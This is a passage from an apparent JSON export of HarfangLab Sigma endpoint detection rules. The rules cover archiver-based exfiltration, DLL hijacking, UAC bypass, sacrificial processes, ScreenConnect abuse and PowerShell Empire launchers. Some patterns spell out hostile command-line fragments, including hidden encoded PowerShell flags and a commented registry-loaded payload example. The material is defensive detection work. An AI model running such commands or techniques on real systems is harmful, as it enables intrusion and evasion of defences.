'?:\\Program Files\\IDEA StatiCa\\StatiCa *\\IdeaConnection.exe'\n - '?:\\Program Files\\IDEA StatiCa\\StatiCa *\\IdeaCheckbot.exe'\n - '?:\\Program Files (x86)\\BigFix Enterprise\\BES Client\\BESClient.exe'\n\n exclusion_peazip1:\n Image:\n - '?:\\program files\\peazip\\res\\7z\\7z.exe'\n - '?:\\program files (x86)\\peazip\\res\\7z\\7z.exe'\n CommandLine|contains: ' -pdefault '\n exclusion_peazip2:\n Image:\n - '?:\\Program Files\\PeaZip\\res\\bin\\7z\\7z.exe'\n - '?:\\Program Files\\PeaZip\\res\\7z\\7z.exe'\n ParentImage: '?:\\Program Files\\PeaZip\\peazip.exe'\n GrandparentImage:\n - '?:\\Program Files\\PeaZip\\peazip.exe'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n - '?:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n - '?:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE'\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n\n exclusion_trendmicro:\n Image:\n - '?:\\Program Files (x86)\\Trend Micro\\Security Server\\PCCSRV\\Pccnt\\Common\\7z.exe'\n - '?:\\Trend Micro\\Security Server\\PCCSRV\\Pccnt\\Common\\7z.exe'\n CommandLine|contains|all:\n - '\\Security Server\\PCCSRV\\pccnt\\common\\7z.exe a -y ?:\\Windows\\TEMP\\\\????????-????-????-????-????????????.7z ?:\\Windows\\TEMP\\\\????????-????-????-????-????????????.7z*'\n - '-mhe=on -mhc=on'\n ParentCommandLine:\n - '?:\\Program Files (x86)\\Trend Micro\\Security Server\\PCCSRV\\\\Web\\Service\\OfcAutoUpdate.exe'\n - '?:\\Trend Micro\\Security Server\\PCCSRV\\\\Web\\Service\\OfcAutoUpdate.exe'\n\n exclusion_manageengine1:\n Image: '*\\7za.exe'\n ParentCommandLine:\n - '*;../lib/AdventNetUpdateManagerInstaller.jar;*'\n - '*;?:\\Program Files\\ManageEngine\\PMP\\scripts\\\\..\\lib\\conf.jar*'\n GrandparentImage:\n - '*\\bin\\wrapper.exe'\n - '?:\\Windows\\system32\\cmd.exe'\n exclusion_manageengine2:\n Image: '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\7z.exe'\n ProcessParentOriginalFileName:\n - 'dcmsghandler.exe'\n - 'dcpatchprompt.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'ZOHO Corporation Private Limited'\n\n # https://www.elisath.fr/\n exclusion_elisath:\n Image: '?:\\Elisath\\Gestion\\7za.exe'\n ParentImage: '?:\\Windows\\System32\\cmd.exe'\n GrandparentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_lgn:\n Image: '?:\\Program Files\\7-Zip\\7z.exe'\n ParentCommandLine:\n - 'Powershell.exe -command import-module Lgpn;Lgpn-Backup'\n - 'Powershell.exe -command import-module Lgpn;Lgpn-Purge-Logs'\n\n exclusion_schedule:\n - ParentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - GrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessParentGrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_axiell:\n GrandparentCommandLine:\n - 'cache -c j -s ?:\\\\*\\mgr'\n - 'irisdb -c j -s ?:\\\\*\\mgr'\n\n condition: (1 of selection_application_*) and selection_parameters and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d2eb031e-a992-4f43-8940-718b51c05cb9",
"rule_name": "Archiver Tool Execution with Suspicious Arguments",
"rule_description": "Detects when a common archiver tool, such as 7Zip or WinRAR, is used with suspicious arguments, such as wiping files after archiving or using encryption.\nThese parameters have been used by threat actors for exfiltrating and deleting data.\nIt is recommended to investigate this behavior to determine if this archiver is not being used on sensitive data.\n",
"rule_creation_date": "2020-12-15",
"rule_modified_date": "2025-10-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1560",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d32f5398-f83d-494f-b0e1-f47d051be155",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608547Z",
"creation_date": "2026-03-23T11:45:34.608550Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608557Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/p3nt4/PowerShdll",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1059_001_powershell_script_execution_through_powershdll.yml",
"content": "title: PowerShell Script Execution via Powershdll\nid: d32f5398-f83d-494f-b0e1-f47d051be155\ndescription: |\n Detects the execution of a PowerShell script through the Powershdll evasion tool.\n Attackers can use this tool to execute PowerShell scripts without spawning the PowerShell executable, allowing them to evade defensive measures.\n It is recommended to investigate the content of the PowerShell script to determine whether this action was legitimate.\nreferences:\n - https://github.com/p3nt4/PowerShdll\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1202/\ndate: 2022/10/11\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\Powershdll.exe'\n - OriginalFileName: 'PowerShdll.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d32f5398-f83d-494f-b0e1-f47d051be155",
"rule_name": "PowerShell Script Execution via Powershdll",
"rule_description": "Detects the execution of a PowerShell script through the Powershdll evasion tool.\nAttackers can use this tool to execute PowerShell scripts without spawning the PowerShell executable, allowing them to evade defensive measures.\nIt is recommended to investigate the content of the PowerShell script to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-10-11",
"rule_modified_date": "2025-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d346505b-2afc-4531-a065-cd4f5c25f675",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591282Z",
"creation_date": "2026-03-23T11:45:34.591286Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591293Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_muiunattend.yml",
"content": "title: DLL Hijacking via muiunattend.exe\nid: d346505b-2afc-4531-a065-cd4f5c25f675\ndescription: |\n Detects potential Windows DLL Hijacking via muiunattend.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'muiunattend.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\SspiCli.dll'\n - '\\wdscore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d346505b-2afc-4531-a065-cd4f5c25f675",
"rule_name": "DLL Hijacking via muiunattend.exe",
"rule_description": "Detects potential Windows DLL Hijacking via muiunattend.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d351b415-d2e7-41f4-8e40-a52d8107de1e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070494Z",
"creation_date": "2026-03-23T11:45:34.070498Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070503Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_credwiz.yml",
"content": "title: Credwiz.exe Sacrificial Process Spawned\nid: d351b415-d2e7-41f4-8e40-a52d8107de1e\ndescription: |\n Detects the suspicious execution of the legitimate credwiz.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by Rhadamanthys, a malicious information stealer which is being distributed mostly via malicious Google advertisements.\n It is recommended to investigate the parent process performing this action and the destination IP address of the credwiz.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/27\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\System32\\credwiz.exe'\n\n filter_parent:\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d351b415-d2e7-41f4-8e40-a52d8107de1e",
"rule_name": "Credwiz.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate credwiz.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by Rhadamanthys, a malicious information stealer which is being distributed mostly via malicious Google advertisements.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the credwiz.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-03-27",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d38af30f-2fd9-4957-b4a8-1c40a7b0868a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077602Z",
"creation_date": "2026-03-23T11:45:34.077604Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077608Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME"
],
"name": "t1548_002_uac_bypass_powrprof.yml",
"content": "title: UAC Bypass Executed via powrprof\nid: d38af30f-2fd9-4957-b4a8-1c40a7b0868a\ndescription: |\n Detects the powrprof.dll DLL hijacking UAC bypass.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME\ndate: 2021/01/06\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\sysprep\\'\n ImageLoaded|endswith: '\\powrprof.dll'\n\n filter_microsoft:\n Signed: 'true'\n Signature|contains: 'Microsoft Windows'\n\n filter_no_info:\n - ImageSize: -1\n - ImageLoaded|startswith: '\\Windows\\' # image starts with \\windows\\ instead of ?:\\windows, so no info possible\n\n exclusion_known_good:\n sha256:\n - 'd926530c659ddaf80770663f46f1efd94ffb4aab475c4e3367cb531af4a734e1' # powrprof.dll version 6.1.7600.16385 (win7_rtm.090713-1255)\n - 'efcd0b1d1afe33b2ebe94dc4d3aaab0b0e6de4f47bc2f9fa873dfac161bb2aac' # powrprof.dll version 6.1.7601.23403 (win7sp1_ldr.160325-0600)\n - 'bc710052925f7db190df51474725c41cae839c8a810c93b43edda98d33499fe2' # powrprof.dll version 10.0.22621.2361 (WinBuild.160101.0800)\n - '9592b7b12bed6f60ca92883b652afb7bf37d369e9f9a577583d68392b100491b' # powrprof.dll version 10.0.19041.3570 (WinBuild.160101.0800)\n\n exclusion_legitimate:\n ImageLoaded:\n - '?:\\Windows\\SysWOW64\\powrprof.dll'\n - '?:\\Windows\\system32\\powrprof.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d38af30f-2fd9-4957-b4a8-1c40a7b0868a",
"rule_name": "UAC Bypass Executed via powrprof",
"rule_description": "Detects the powrprof.dll DLL hijacking UAC bypass.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible to look for malicious content or actions.\n",
"rule_creation_date": "2021-01-06",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d39ad600-7c50-41ca-aedb-35a550b25c79",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089175Z",
"creation_date": "2026-03-23T11:45:34.089178Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089182Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/insomniacs/analysis-walkthrough-fun-clientrun-part-1-b2509344ebe6",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_outlook.yml",
"content": "title: DLL Hijacking via Outlook.exe\nid: d39ad600-7c50-41ca-aedb-35a550b25c79\ndescription: |\n Detects potential Windows DLL Hijacking via Outlook.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://medium.com/insomniacs/analysis-walkthrough-fun-clientrun-part-1-b2509344ebe6\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Outlook.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\msctf.dll'\n - '\\mswsock.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\outllib.dll'\n - '\\rsaenh.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\OFFICE*\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE*\\'\n - '?:\\Program Files\\Microsoft Office\\OFFICE*\\'\n - '?:\\Program Files\\Microsoft Office\\Root\\OFFICE*\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\OFFICE*\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE*\\'\n - '?:\\Program Files\\Microsoft Office\\OFFICE*\\'\n - '?:\\Program Files\\Microsoft Office\\Root\\OFFICE*\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n condition: selection and not 1 of filter_*\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d39ad600-7c50-41ca-aedb-35a550b25c79",
"rule_name": "DLL Hijacking via Outlook.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Outlook.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d3ad8869-3c7f-431b-ac23-e8f896fc81f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603440Z",
"creation_date": "2026-03-23T11:45:34.603444Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603452Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling",
"https://dfirtnt.wordpress.com/2023/07/14/rmm-screenconnect-client-side-evidence/",
"https://attack.mitre.org/techniques/T1219/002/",
"https://attack.mitre.org/techniques/T1059/003/"
],
"name": "t1219_002_screenconnect_command_via_cmd.yml",
"content": "title: Windows Shell Command Executed via ScreenConnect\nid: d3ad8869-3c7f-431b-ac23-e8f896fc81f1\ndescription: |\n Detects a command execution through ScreenConnect, a legitimate remote access tool that can be used by attackers as an initial access or C2 vector.\n Attackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\n It is recommended to investigate this command to determine its legitimacy.\nreferences:\n - https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling\n - https://dfirtnt.wordpress.com/2023/07/14/rmm-screenconnect-client-side-evidence/\n - https://attack.mitre.org/techniques/T1219/002/\n - https://attack.mitre.org/techniques/T1059/003/\ndate: 2023/11/10\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - attack.execution\n - attack.t1059.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.ScreenConnect\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine|contains: '\\TEMP\\ScreenConnect\\\\*run.cmd'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d3ad8869-3c7f-431b-ac23-e8f896fc81f1",
"rule_name": "Windows Shell Command Executed via ScreenConnect",
"rule_description": "Detects a command execution through ScreenConnect, a legitimate remote access tool that can be used by attackers as an initial access or C2 vector.\nAttackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\nIt is recommended to investigate this command to determine its legitimacy.\n",
"rule_creation_date": "2023-11-10",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.003",
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d3f304b8-1e9a-4470-9285-7d649bfba41d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073322Z",
"creation_date": "2026-03-23T11:45:34.073324Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073328Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/BC-SECURITY/Empire/"
],
"name": "t1059_001_empire_powershell_launcher.yml",
"content": "title: PowerShell Empire Launcher Detected\nid: d3f304b8-1e9a-4470-9285-7d649bfba41d\ndescription: |\n Detects a PowerShell command-line containing arguments that are related to Empire Attack Framework launcher.\n Attackers may use Empire to maintain access to a compromised system.\n It is recommended to the newly created process for any suspicious activities.\nreferences:\n - https://github.com/BC-SECURITY/Empire/\ndate: 2020/09/29\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.s0363\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Empire\n - classification.Windows.Script.PowerShell\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n selection_2:\n CommandLine|contains:\n - '-noP -sta -w 1 -enc'\n - '-NoP -NonI -W Hidden -enc'\n - '-NoP -sta -NonI -W Hidden'\n # \"SQBmAC... which decodes to If($PSVErSIONTaBLe.PSVERsIOn.MaJor -GE 3 in UTF16 ('I\\x00f\\x00(\\x00...'')\n # match on the beginning only\n - ' -enc SQBmACgAJA'\n - ' -enc SQBmACgAJA'\n # \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x=$((gp HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x\"\n - 'powershell -Win Hidden -enc ?x'\n # Match on IEX\n - '-nop -exec bypass -EncodedCommand 